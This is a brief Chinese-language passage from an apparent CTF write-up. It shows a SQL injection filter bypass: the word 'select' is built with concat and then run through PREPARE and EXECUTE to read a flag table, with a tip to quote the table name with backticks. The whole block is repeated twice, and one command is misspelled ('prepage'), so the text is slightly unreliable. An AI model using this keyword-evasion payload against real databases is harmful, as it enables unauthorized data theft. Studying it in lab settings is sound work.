set @b=concat("sel","ect flag from `1919810931114514` ");
PREPARE:准备一条SQL语句,并分配给这条SQL语句一个名字供之后调用
prepage hello from @b;
EXECUTE :执行命令
execute hello;
即可在过滤了select的时候执行select命令
这题还有一个比较坑的地方,不知道是复现问题还是什么 如果使用 '' 这个去加表名的引号则不行
需要使用 `` 来当做引号
set @b=concat("sel","ect flag from `1919810931114514` ");
PREPARE:准备一条SQL语句,并分配给这条SQL语句一个名字供之后调用
prepage hello from @b;
EXECUTE :执行命令
execute hello;
即可在过滤了select的时候执行select命令
这题还有一个比较坑的地方,不知道是复现问题还是什么 如果使用 '' 这个去加表名的引号则不行
需要使用 `` 来当做引号